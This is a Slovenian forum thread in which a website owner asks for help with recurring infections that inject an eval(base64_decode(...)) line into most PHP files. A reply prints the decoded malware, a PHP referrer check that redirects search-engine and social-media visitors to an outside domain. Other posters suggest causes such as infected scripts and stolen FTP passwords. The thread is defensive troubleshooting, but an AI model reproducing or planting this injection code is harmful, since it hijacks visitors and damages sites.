Stalno vdiranje na spletno stran

17 naročnikov

Zadnje čase se mi na spletni strani, ki sploh ni live, dogajajo neprestani vdori, ki pa jih ni v nobenem logu. Po vdoru je skoraj vsem php datotekam dodana neka čudna koda, takoj za <?php :
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDAp................

stran se potem normalno sesuva vsako jutro :(

Ima kdo kako idejo kaj naredit preden grem s stranjo live?

Leo:
Kakšna pa je koda, če jo decodaš s tem http://www.opinionatedgeek.com/dotnet/tools/base64decode/?

Koda (tudi zate JWeb):
errorreporting(0);
$qazplm=headerssent();
if (!$qazplm){
$referer=$SERVER['HTTPREFERER'];
$uag=$SERVER['HTTPUSER_AGENT'];
if ($uag) {
if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"baidu.com") or stristr($referer,"doubleclick.net") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or stristr($referer,"clickbank.net") or stristr($referer,"blogspot.com") or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://breakingbad.osa.pl/");
exit();
}
}
}
}

Aha, preusmeritev k poljaku :P

Sledi o "vdoru" ne boš našel, ker ti nihčer ne vdira ampak se preko skripte doda škodljiva koda... Moral boš najti izvor - katera datoteka ti generira to kodo in zapiše po različnih datotekah... Če imaš kak odprtokodni sistem, ki sicer sam po sebi ni škodljiv (Joomla, WP, Drupal,...) potem je razlog verjetno (razen če ima še kdo dostop do tvojega strežnika) kakšna komponenta, modul,... ki si jih nalagal. Če uporabljaš neko skripto kot celoten protal, potem je lahko že ta "škodljiva" oziroma, če si dobil kakšno "skrekano" skripto oziroma jo pridobil s kakšnega portala kjer "brezplačno" objavljajo komercialne skripte, potem si si pač naložil okuženo skripto...

Možen vzrok je tudi tema, sem že v nekaj free temah našel take cvetke.

emcee:
Možen vzrok je tudi tema, sem že v nekaj free temah našel take cvetke.

Tema ne bo mogla bit vzrok, gre za kupljeno skripto, design je bil ročno predelan.

Tudi kupljene skripe vsebujejo razne varnostne luknje ;)

ko so predleoval temo si pozabil odstranit pravice oz spremnit nazaj oz nimas instalirnega na serverju zascite

aja free teme za wp imajo povecini tudi kodirane dele to pa zaro da tega ne mores spreminjat in nimajo veze s pirshing napadi ..

bilten:
ko so predleoval temo si pozabil odstranit pravice oz spremnit nazaj oz nimas instalirnega na serverju zascite

Ne vem zakaj bi kupljena skripta z eno samo temo bila kakorkoli zaščitena, saj ni uporabna za nikamor drugam.
Skripta je standalone in ni kaka Joomla, WP,...

Počistu sm eval decode kodo, zamenju vse ftp accounte, preveru za viruse.
Če se bo problem spet pojavil to verjetno pomeni da je nekaj narobe s skripto, ki sem jo pošteno plačal?

Ce uporavljas filezillo, ali kakšen drug FTP, ki slabo skrbi za varnost shranjenih gesel, raje ne shranjuj gesel.